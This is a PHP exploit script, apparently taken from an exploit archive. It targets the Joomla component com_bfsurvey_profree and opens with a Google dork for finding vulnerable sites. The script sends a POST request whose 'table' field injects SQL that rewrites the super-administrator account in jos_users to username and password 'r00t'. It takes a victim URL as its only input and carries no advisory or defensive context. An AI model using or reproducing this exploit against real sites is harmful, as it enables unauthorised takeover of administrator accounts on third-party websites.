Google dork: inurl:com_bfsurvey_profree
'; ini_set( "memory_limit", "128M" ); ini_set( "max_execution_time", 0 ); set_time_limit( 0 ); if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' ); $vulnerableFile = "http://".$_GET['url']."/index.php"; $url = $vulnerableFile; $data = array(); $data['option'] = 'com_bfsurvey_profree'; $data['task'] = 'updateOnePage'; $data['table'] = "jos_users set username=CHAR(".sqlChar( 'r00t' )."), password=CHAR(".sqlChar( md5('r00t' ) )."), email=CHAR(".sqlChar( 'x' ).") where gid=25 limit 1 -- '"; $output = getData(); die( '' ); function shutUp( $buffer ) { return false; } function sqlChar( $str ) { return implode( ',', array_map( 'ord', str_split( $str ) ) ); } function getData() { global $data, $url; ob_start( "shutUp" ); $ch = curl_init(); curl_setopt( $ch, CURL_TIMEOUT, 120 ); curl_setopt( $ch, CURL_RETURNTRANSFER, 0 ); curl_setopt( $ch, CURLOPT_URL, $url ); if( count( $data ) > 0 ) { curl_setopt( $ch, CURLOPT_POST, count( $data ) ); curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $data ) ); } curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 ); $result = curl_exec( $ch ); curl_close( $ch ); $return = ob_get_contents(); ob_end_clean(); return $return; } ?>